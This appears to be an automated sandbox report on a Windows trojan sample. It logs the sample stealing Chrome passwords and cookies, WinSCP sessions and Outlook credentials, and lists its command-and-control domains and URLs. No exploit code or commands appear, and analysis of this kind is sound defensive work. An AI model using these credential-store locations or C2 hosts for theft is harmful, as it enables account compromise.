Source: unknown HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 190.115.26.106:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 190.115.26.106:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 62.75.198.178:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 62.75.198.178:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.54.82.13:443 -> 192.168.2.6:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.12.6:443 -> 192.168.2.6:49781 version: TLS 1.2

System Summary:

barindex
Tries to load missing DLLs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Section loaded: msxml3.dll Jump to behavior
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Yara signature match
Source: 00000001.00000003.337105580.0000000002BF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: classification engine Classification label: mal72.spyw.winEXE@1/1@25/8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Mutant created: \Sessions\1\BaseNamedObjects\53E61D202B0F807656615
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Virustotal: Detection: 66%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Metadefender: Detection: 18%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Is looking for software installed on the system
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Registry key enumerated: More than 171 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Process token adjusted: Debug Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
88.80.20.20
unknown Sweden
33837 PRQ-AS________________________SE false
190.115.26.106
unknown Belize
262254 DDOS-GUARDCORPBZ false
62.75.198.178
unknown Germany
8972 GD-EMEA-DC-SXB1DE false
88.80.21.20
unknown Sweden
33837 PRQ-AS________________________SE false
144.76.12.6
unknown Germany
24940 HETZNER-ASDE false
194.54.82.13
unknown Ukraine
41018 OMNILANCEhttpomnilancecomUA false
194.54.82.12
unknown Ukraine
41018 OMNILANCEhttpomnilancecomUA false
47.91.94.99
unknown United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true

Contacted Domains

Name IP Active
bdns.im 194.54.82.12 true
bdns.by 88.80.20.20 true
bdns.nu 88.80.20.20 true
bdns.pro 194.54.82.12 true
bdns.io 190.115.26.106 true
bdns.co 88.80.21.20 true
dotbit.me 144.76.12.6 true
dolboeb1701.com 47.91.94.99 true
bdns.link 62.75.198.178 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://bdns.link/r/kpotuvorot10.bit false
  • Avira URL Cloud: safe
unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/login.php true
  • Avira URL Cloud: safe
unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/util.php true
  • Avira URL Cloud: safe
unknown
https://bdns.pro/r/kpotuvorot10.bit false
  • Avira URL Cloud: safe
unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615 true
  • Avira URL Cloud: safe
unknown
http://dolboeb1701.com/bgczXibj92HSlSCK/ true
  • Avira URL Cloud: safe
unknown
https://bdns.im/r/kpotuvorot10.bit false
  • Avira URL Cloud: safe
unknown
https://bdns.by/r/kpotuvorot10.bit false
  • Avira URL Cloud: safe
unknown
https://bdns.co/r/kpotuvorot10.bit false
  • Avira URL Cloud: safe
unknown
http://dolboeb1701.com/bgczXibj92HSlSCK true
  • Avira URL Cloud: safe
unknown
https://bdns.nu/r/kpotuvorot10.bit false
  • Avira URL Cloud: safe
unknown
http://47.91.94.99/bgczXibj92HSlSCK true
  • Avira URL Cloud: safe
unknown
https://bdns.io/r/kpotuvorot10.bit false
  • Avira URL Cloud: safe
unknown